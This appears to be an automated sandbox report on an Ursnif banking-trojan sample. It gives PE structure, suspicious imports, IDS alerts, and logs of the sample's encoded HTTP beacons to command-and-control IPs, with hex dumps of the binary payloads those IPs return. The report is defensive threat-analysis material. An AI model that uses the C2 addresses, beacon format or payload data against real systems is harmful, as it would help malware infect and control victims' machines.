IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6000	0x10	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7000	0xe4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3000	0xb0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1032	0x1200	False	0.6486545138888888	data	6.161261111602468	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x3000	0x4fe	0x600	False	0.4765625	data	4.589727757248314	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x4000	0x194	0x200	False	0.056640625	data	0.12227588125913882	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x5000	0x2dc	0x400	False	0.7626953125	data	6.293260607563598	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x6000	0x10	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x7000	0x8000	0x7200	False	0.9707373903508771	data	7.859943871884214	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Imports

DLL	Import
ntdll.dll	_snwprintf, memset, NtQuerySystemInformation, _aulldiv
KERNEL32.dll	GetModuleHandleA, GetLocaleInfoA, GetSystemDefaultUILanguage, HeapAlloc, HeapFree, HeapCreate, Sleep, ExitThread, lstrlenW, GetLastError, VerLanguageNameA, GetExitCodeThread, CloseHandle, HeapDestroy, GetCommandLineW, ExitProcess, WaitForSingleObject, GetModuleFileNameW, CreateThread, QueueUserAPC, SetLastError, TerminateThread, SleepEx, OpenProcess, CreateEventA, GetLongPathNameW, GetVersion, GetCurrentProcessId, GetProcAddress, LoadLibraryA, VirtualProtect, VirtualFree, VirtualAlloc, MapViewOfFile, GetSystemTimeAsFileTime, CreateFileMappingW
ADVAPI32.dll	ConvertStringSecurityDescriptorToSecurityDescriptorA

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.4194.76.225.6149703802033204 10/11/22-15:05:22.646934	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49703	80	192.168.2.4	194.76.225.61
192.168.2.4194.76.225.6149703802033203 10/11/22-15:04:23.184080	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49703	80	192.168.2.4	194.76.225.61
192.168.2.452.169.118.17349701802033203 10/11/22-15:04:05.807282	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49701	80	192.168.2.4	52.169.118.173
192.168.2.452.169.118.17349698802033203 10/11/22-15:01:36.640930	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49698	80	192.168.2.4	52.169.118.173
192.168.2.452.169.118.17349698802033204 10/11/22-15:01:36.640930	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49698	80	192.168.2.4	52.169.118.173
192.168.2.4194.76.225.6149703802021814 10/11/22-15:05:22.646934	TCP	2021814	ET TROJAN Ursnif Variant CnC Beacon 3	49703	80	192.168.2.4	194.76.225.61
192.168.2.4194.76.225.6049700802033204 10/11/22-15:01:58.649008	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49700	80	192.168.2.4	194.76.225.60
192.168.2.4194.76.225.6049700802033203 10/11/22-15:01:58.649008	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49700	80	192.168.2.4	194.76.225.60

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 11, 2022 15:01:57.874542952 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:57.901532888 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:57.901772022 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:57.902332067 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:57.929052114 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.113888025 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.113917112 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.113931894 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.114109039 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.114145041 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.114202023 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.114213943 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.114228964 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.114259005 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.114490032 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.114511967 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.114525080 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.114542007 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.114558935 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.114953995 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.115010023 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.115015984 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.115056038 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.115109921 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.115124941 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.115171909 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.115336895 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.115389109 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.141719103 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.141745090 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.141760111 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.141885042 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.141915083 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.141921997 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.141936064 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.141954899 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.141967058 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.141973019 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.141985893 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.141997099 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.142033100 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.142076969 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142119884 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.142170906 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142184973 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142210007 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.142319918 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142337084 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142349958 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142371893 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.142391920 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.142405033 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142422915 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142436028 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142446041 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.142476082 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.142597914 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142616034 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142628908 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142644882 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142646074 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.142671108 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.142679930 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142690897 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.142693043 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142720938 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.142868042 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142896891 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142910004 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142923117 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.142927885 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142952919 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.142962933 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142973900 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.142976999 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.143002987 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.170586109 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.170638084 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.170664072 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.170692921 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.170722008 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.170742989 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.170768023 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.170804977 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.171019077 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.171050072 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.171144009 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.171161890 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.171192884 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.171245098 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.171261072 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.171267033 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.171289921 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.171745062 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.171776056 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.171794891 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.171830893 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.171855927 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.172018051 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.172046900 CEST	80	49700	194.76.225.60	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 11, 2022 15:01:36.531193018 CEST	50911	53	192.168.2.4	8.8.8.8
Oct 11, 2022 15:01:36.707911015 CEST	59683	53	192.168.2.4	8.8.8.8
Oct 11, 2022 15:04:05.568264008 CEST	64167	53	192.168.2.4	8.8.8.8
Oct 11, 2022 15:04:05.901148081 CEST	58565	53	192.168.2.4	8.8.8.8
Oct 11, 2022 15:04:05.918076038 CEST	53	58565	8.8.8.8	192.168.2.4
Oct 11, 2022 15:04:28.375722885 CEST	58566	53	192.168.2.4	8.8.8.8
Oct 11, 2022 15:04:28.394582033 CEST	53	58566	8.8.8.8	192.168.2.4
Oct 11, 2022 15:04:28.398575068 CEST	58567	53	192.168.2.4	8.8.8.8
Oct 11, 2022 15:04:28.417346001 CEST	53	58567	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 11, 2022 15:01:36.531193018 CEST	192.168.2.4	8.8.8.8	0xe9f7	Standard query (0)	tel12.msn.com	A (IP address)	IN (0x0001)	false
Oct 11, 2022 15:01:36.707911015 CEST	192.168.2.4	8.8.8.8	0xb225	Standard query (0)	www.msn.com	A (IP address)	IN (0x0001)	false
Oct 11, 2022 15:04:05.568264008 CEST	192.168.2.4	8.8.8.8	0xd053	Standard query (0)	apnfy.msn.com	A (IP address)	IN (0x0001)	false
Oct 11, 2022 15:04:05.901148081 CEST	192.168.2.4	8.8.8.8	0xd021	Standard query (0)	www.msn.com	A (IP address)	IN (0x0001)	false
Oct 11, 2022 15:04:28.375722885 CEST	192.168.2.4	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Oct 11, 2022 15:04:28.398575068 CEST	192.168.2.4	8.8.8.8	0x2	Standard query (0)	1.0.0.127.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 11, 2022 15:01:36.567296028 CEST	8.8.8.8	192.168.2.4	0xe9f7	No error (0)	tel12.msn.com	redirection.prod.cms.msn.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2022 15:01:36.567296028 CEST	8.8.8.8	192.168.2.4	0xe9f7	No error (0)	redirection.prod.cms.msn.com	redirection.prod.cms.msn.com.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2022 15:01:36.724606991 CEST	8.8.8.8	192.168.2.4	0xb225	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2022 15:01:36.724606991 CEST	8.8.8.8	192.168.2.4	0xb225	No error (0)	www-msn-com.a-0003.a-msedge.net	icePrime.a-0003.dc-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2022 15:04:05.746361017 CEST	8.8.8.8	192.168.2.4	0xd053	No error (0)	apnfy.msn.com	redirection.prod.cms.msn.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2022 15:04:05.746361017 CEST	8.8.8.8	192.168.2.4	0xd053	No error (0)	redirection.prod.cms.msn.com	redirection.prod.cms.msn.com.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2022 15:04:05.918076038 CEST	8.8.8.8	192.168.2.4	0xd021	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2022 15:04:05.918076038 CEST	8.8.8.8	192.168.2.4	0xd021	No error (0)	www-msn-com.a-0003.a-msedge.net	a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2022 15:04:05.918076038 CEST	8.8.8.8	192.168.2.4	0xd021	No error (0)	a-0003.a-msedge.net		204.79.197.203	A (IP address)	IN (0x0001)	false
Oct 11, 2022 15:04:28.394582033 CEST	8.8.8.8	192.168.2.4	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)	false
Oct 11, 2022 15:04:28.417346001 CEST	8.8.8.8	192.168.2.4	0x2	Name error (3)	1.0.0.127.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

194.76.225.60

www.msn.com

194.76.225.61

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49700	194.76.225.60	80	C:\Users\user\Desktop\Lx6.exe

Timestamp	kBytes transferred	Direction	Data
Oct 11, 2022 15:01:57.902332067 CEST	416	OUT	GET /doorway/j2Kh1F01rzc/C8YfqfqOL0fd_2/Faja_2BeyQazoCIhY8EM9/jtWW9dUBZLJi2O8c/5bSyBdVOxMEWaUX/ShuObsG4WHyjfvJOvS/7Etsx6H8b/xJ9ufj3B90qCwQfbGxOr/E6EEqhpsHuAJvMjEWxJ/bbt9tD_2FAMRZ0X6mUy9CA/ykkOKoxULnECB/ejdchRP6/xdR6yPCPWIpLVR5uBosZgJc/ZByIsZgREK/Fk_2Feeg2_2Bk9KT9/iLNnOQl_2B8z/5ltZk0GHQaA/kR9XvP8sc8BQlA/LXFn1z6p/VlTMdML3/9.drr HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 194.76.225.60 Connection: Keep-Alive Cache-Control: no-cache
Oct 11, 2022 15:01:58.113888025 CEST	417	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 11 Oct 2022 13:01:58 GMT Content-Type: application/octet-stream Content-Length: 181405 Connection: keep-alive Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: inline; filename="63456946168f5.bin" Data Raw: 77 cb f2 ef ac ff 08 91 16 18 ee e3 e3 67 7b dc 6d 1e 1b 98 69 1d 6e a9 f9 35 71 f4 6b 19 ec be c4 6b ac 18 fa c6 45 1e 9f db 70 45 a0 04 a6 6d 1a b1 51 e1 f5 99 09 f6 91 13 ef f9 b1 70 5a 88 82 35 2b 90 e5 ec 1b 56 c3 d0 a2 fc db 07 e4 84 53 cb 07 f4 9a 7b 88 d3 c8 60 32 2f 76 84 20 05 f1 ee 0d 6e cb 9a ba ce a5 8a ee 1e 74 45 cc 38 37 68 c1 8d 9f 0f 7b 10 84 53 46 73 a7 bf d6 7c d7 ee 52 26 45 38 06 3a 86 1f 6b 16 65 6a 7b a5 64 dc cd 68 04 ac 25 38 3e ce 93 e7 15 b7 f1 58 c0 bb 07 10 f9 c8 74 8c c0 72 39 75 d8 69 ee 81 7a ab b8 32 cd e8 8a 0c 80 62 61 ca 0c 21 93 69 80 27 31 1b 62 cd 44 77 fa 24 cb a5 7b 1b 2e 6a 9d df 99 43 53 2f 7e 29 a7 ed 3f 09 4f b8 43 5e 92 99 e5 78 25 d4 a9 12 bc 32 a3 60 1d 42 0e cc 66 a7 83 81 d6 79 fd a7 79 27 c8 a4 b3 9a 2a 18 8a de 2c 20 91 18 94 6c c3 e1 09 51 12 ee 2a 88 c0 b4 7b 9f 26 6d 7b d4 a2 d4 ef 7d 50 69 48 b2 8c 87 85 ec 3d 56 92 e9 56 14 e4 42 3a 50 76 4e 12 83 9b dd c8 07 72 42 9f 2a c8 08 03 a3 70 ba e2 ca be b9 5b 99 4b 66 f3 fc de 34 e3 69 c2 9e 2c c7 ca 25 31 73 13 a8 40 56 16 04 09 b8 ba d4 f0 e5 25 71 e7 08 e0 73 2b a8 c2 c2 f3 4c a3 23 48 fe 79 f0 f8 8e ad 81 bc 96 c2 1e bd 56 84 69 bd 19 5e f4 04 d8 6e d7 f5 c9 b1 f0 af 1c 0c 9f cf fe c6 09 7a 59 4b c3 e5 ac 1d ae 7a 90 6d 58 05 d4 92 b3 7f 5e 88 62 0f 84 e4 20 c4 46 47 f0 a2 86 0d a3 cd d8 00 eb 7f ee 60 ab 84 db 99 91 0d 0f 4c da f3 82 bf d6 d7 5d ef 4e 17 f1 75 c0 c0 4e 96 5d 34 59 cf 7e fd 18 58 3f e1 ca 8c d5 b3 a5 cb 7a 39 10 34 c0 50 c4 e6 08 23 53 67 cc 56 8b 5c 87 2e e8 77 5a 6f c5 f9 07 fe 6f 7a 05 09 59 e6 f9 0f 7c 16 73 10 d2 1a d9 ab 5f f7 ed 6b f9 20 e7 3d 7e 84 c9 64 71 b4 33 8f 81 1f 2a 43 99 32 eb 62 78 bb 0b 29 a4 e8 ce 23 bc d0 ea bc ee 69 43 ee 90 9c 39 83 69 0a e0 70 de 2c 17 80 4d fa 19 ef c3 6f 7a d5 95 2a 76 7a 36 c6 ab 54 d3 95 3b 40 a5 34 04 11 54 a6 ab 69 6b fe 06 88 37 4f 4a db cd fe 7f ea 17 a4 38 1c 3b a0 3f 7e f2 d0 b8 f6 36 d2 b2 d9 36 8f 4e b9 a0 de d1 79 2b 6c 7f 6f 2c 24 d4 e3 0c c6 3f 5f d1 77 b9 d4 9c 31 9c 02 40 da e6 bd f0 d2 0f 99 60 78 db 6e 43 43 23 e6 ab ce d9 e3 5d d1 7c 0f 31 3d 8b 85 33 20 0c d5 88 66 61 54 1b 0a b1 4d 32 3e d3 ba 57 c0 fe 93 60 61 21 53 ff d2 5e 61 a0 ac 01 d4 17 82 8b 7c 79 b3 76 0c d1 37 25 75 af 24 39 4a f4 de aa ed e1 31 0a 57 dd 33 0d 46 25 7e b9 a9 a5 eb 71 0a d8 68 2c 9e 1f 48 70 b1 81 7f 4e 0c 6d cf 06 30 6f 2a 9f b3 78 db 01 8d ac a7 b4 2e de 9e 88 52 a8 ed 9d 04 1a 56 a3 d9 51 a0 92 af ce 3f c6 fe ec 38 c2 94 69 cf 68 3d 4d af 28 81 c6 17 34 3b bb 9f c3 22 50 ed fd 4e e0 11 39 8e a4 da f0 eb f7 de 19 fc 62 f0 22 db e5 f1 4f bc 78 f1 7a d4 99 3c 78 88 9e 3d 40 ab c4 25 bd f5 50 2b 97 ca a7 24 87 91 5e d1 88 62 6e 2f 6b ec 70 dc 5d f9 91 12 45 ee 1d 79 e8 6a 6a c6 5d 78 72 e8 1b 19 54 63 d8 2f f3 2e 26 ef 25 ea 29 46 91 8b c2 24 ef 06 c4 ab 9c 26 1a 75 d4 da 3d 0d b3 75 5e f4 ce 33 bb f1 60 23 75 ac 29 fd Data Ascii: wg{min5qkkEpEmQpZ5+VS{`2/v ntE87h{SFs\|R&E8:kej{dh%8>Xtr9uiz2ba!i'1bDw${.jCS/~)?OC^x%2`Bfyy', lQ{&m{}PiH=VVB:PvNrBp[Kf4i,%1s@V%qs+L#HyVi^nzYKzmX^b FG`L]NuN]4Y~X?z94P#SgV\.wZoozY\|s_k =~dq3C2bx)#iC9ip,Mozvz6T;@4Tik7OJ8;?~66Ny+lo,$?_w1@`xnCC#]\|1=3 faTM2>W`a!S^a\|yv7%u$9J1W3F%~qh,HpNm0ox.RVQ?8ih=M(4;"PN9b"Oxz<x=@%P+$^bn/kp]Eyjj]xrTc/.&%)F$&u=u^3`#u)
Oct 11, 2022 15:01:58.227384090 CEST	611	OUT	GET /doorway/BIhFC1DHq0NxSqN_2Fq5v/hicggKY4SgwJPP6D/F4xxZuIhTddt0HO/A_2B6u1ukXktqk9I1N/03tCA2eZF/F2lX7Km3UL6Oc40qXR7I/S_2Bu_2F1gAnwxNSHl_/2B_2BIw1VXdQgjLWDGSvzH/6KsVMipemRsxc/s39L4jXr/llySx2Z4YWz6hWH3fehvPN_/2B4i_2B9D9/MRxPcto8_2FTKi6Ul/Lo0znElngJCM/KVK8xvLBVm9/FogU94tV1Oz3NS/xOy9YP2f0yNELqTpaSapG/CGthTWmcja_2By_2/BWnMuFbG2_2/FigtxC.drr HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 194.76.225.60 Connection: Keep-Alive Cache-Control: no-cache
Oct 11, 2022 15:01:58.431793928 CEST	613	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 11 Oct 2022 13:01:58 GMT Content-Type: application/octet-stream Content-Length: 233105 Connection: keep-alive Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: inline; filename="634569466442b.bin" Data Raw: b0 de 4f 49 3e 24 d7 25 8f 5f 32 cb 68 d0 f4 93 af f0 7f 50 64 1d fb 9c 51 47 b4 37 b4 c3 b3 f2 09 f9 64 44 05 e5 ed 84 78 d9 45 a6 f9 2d 18 c3 5e 5f df 2b 4c ec 3b ba 3d 44 d0 f2 1a d5 df f7 0d 15 3c b7 8e c0 c2 ff d0 0b da e3 7f 42 b0 bf 11 3d 60 17 af d1 a5 4d ad 0b 70 61 cc 77 74 11 55 8f 1c 17 3d d4 b3 56 52 46 4e 66 ae 4b 1d ea 18 a4 f3 0d fc 81 df 1c 6a 05 49 87 38 b8 e9 c6 29 5d 1e b3 68 5f f8 47 25 64 f8 47 da 6d cc 5b cb f9 42 9c 04 17 3f a7 ec 18 cd 62 cf 82 99 f3 48 a5 bb 22 98 d4 c5 1c 82 3a 97 e8 c4 11 d7 61 fd 67 7b 08 6b c8 25 98 15 11 9b c6 cb 2f 74 c8 f0 67 8c 07 36 69 01 b2 51 56 e2 22 39 2d 64 a1 a3 56 c5 7a 4e b8 6d fa d7 f7 c4 94 70 17 fe c5 d9 c3 2d e4 6f 2c 4a 36 3b 4f 85 b9 a3 df 9c 3d 04 fd d3 2c b6 7b 89 27 ac eb 85 f5 f2 e3 78 73 f8 06 00 c8 88 01 62 35 a3 49 2b 3b 5c 4e 6d cc 08 67 53 dc 87 49 e7 ec b7 8a a1 7e 10 6f 4c dc 49 93 d6 eb b7 64 5e 93 9f aa 84 8f a5 9c 17 84 5d cf 4e a1 55 c0 02 92 70 13 68 c7 9c b9 10 e5 1a 0d cf 2f 16 b7 4f d4 ce c5 1f 93 14 44 e1 5f 49 3d 92 54 11 76 9a c0 93 8b 67 f4 9c ba 8e 29 f6 21 3f d1 46 59 45 65 df 09 41 9e 95 10 08 ab 9b 38 39 bd f9 00 3f 33 34 af 87 7f b0 b8 3b 5b 62 5d 51 f1 e7 ec f0 43 62 b0 05 12 4b 11 f7 c0 43 0f 9f 49 39 c9 03 18 6f 1f dc 85 84 44 72 ce 2e e4 89 16 88 6c 1a 74 67 8b 40 13 f2 4c 14 b4 7a 9c 74 28 dc c8 ca 10 59 2b 6c cc bd 4b 3b f7 0b 17 1b d8 95 c0 37 94 91 d6 ec 50 94 e7 e8 2c 28 cc 7c f8 15 b0 75 c5 cb 93 31 fd 15 9e 25 7c 53 8b da e8 55 e7 67 f1 0b 3c 65 cc bf dd 0f 0d ea 79 ed 3a 68 a0 4c 3b 61 da f5 58 70 a0 89 9f 18 39 7d 1b b9 8f 8d 49 0d e4 65 4a 67 03 46 e2 e4 4b b3 65 f7 2d 0f 68 84 37 ba e3 d1 50 41 bc 62 4e b0 1b 4a f5 6c 6b 1f 26 c4 3a 0a a5 26 5a 4f 35 35 d3 ad 2d c7 01 b8 64 f5 da 25 9f d5 5a d6 f8 ab f8 d5 14 f6 9a 28 06 aa 55 80 9f 2a 51 6f cc 4d af 2a 88 bc f2 50 72 11 b5 7e e0 3b b8 f7 5f 5f f5 52 32 a3 be 70 4c 79 0a d8 45 5c b5 5b ca 11 2f 10 dd 20 02 f0 9e 2b 61 58 a2 58 98 51 bd b5 ba aa 6d 16 b7 12 8a 07 75 37 de c4 03 e4 5f 5e 3d fd 36 10 b5 43 5c e0 01 56 e1 69 af 3f a8 f6 01 19 4b 9d 5d 94 d4 2c 37 be 8d bb ea f5 d2 46 4e 2e 9d 07 42 f7 c9 05 4c 79 69 7e f5 a9 8e a9 34 5c 91 55 a1 97 56 63 b2 7e fd 01 72 7f 16 b1 9e df 83 ab 19 a5 9d 43 66 d2 f2 90 15 4f 7d 97 52 6c 3d c1 99 d4 0e c6 85 de f4 8c 29 66 fa 